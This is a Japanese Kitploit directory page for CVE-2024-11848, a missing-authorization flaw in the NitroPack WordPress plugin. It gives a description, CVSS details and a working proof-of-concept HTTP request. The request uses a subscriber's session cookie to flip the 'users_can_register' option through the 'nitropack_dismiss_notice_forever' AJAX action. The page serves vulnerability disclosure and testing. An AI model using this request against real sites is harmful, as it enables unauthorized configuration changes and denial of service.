Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-11848 — NitroPack <= 1.17.0 - 認証済み(Subscriber+)ユーザーによる限定的なオプション更新が可能な認可の欠如 | Kitploit
ツール/GitHubGitHub/randomrobbiebf/cve-2024-11848
認証と認可脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト設定ミス
GitHubrandomrobbiebf/cve-2024-11848

CVE-2024-11848

NitroPack <= 1.17.0 - 認証済み(Subscriber+)ユーザーによる限定的なオプション更新が可能な認可の欠如

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-11848

NitroPack <= 1.17.0 - 認証済み(購読者以上)ユーザーによる限定的オプション更新を可能にする認可欠如

説明

WordPress用NitroPackプラグインは、バージョン1.17.0までの全バージョンにおいて、'nitropack_dismiss_notice_forever' AJAXアクションに対するケイパビリティチェックが欠如しているため、データの不正な変更に対して脆弱です。これにより、購読者レベル以上のアクセス権を持つ認証済み攻撃者が、任意のオプションを固定値'1'に更新することが可能になります。その結果、特定のオプション(例:ユーザー登録の有効化)を有効にしたり、サービス拒否状態を引き起こす形で特定のオプションを変更したりすることができます。

詳細

  • タイプ: プラグイン
  • スラッグ: nitropack
  • 影響を受けるバージョン: 1.17.0
  • CVSSスコア: 8.1
  • CVSS評価: 高
  • CVSSベクター: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-11848
  • ステータス: 有効

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88

action=nitropack_dismiss_notice_forever&security=92f60ea3ea&notice_id=users_can_register
ツールをダウンロード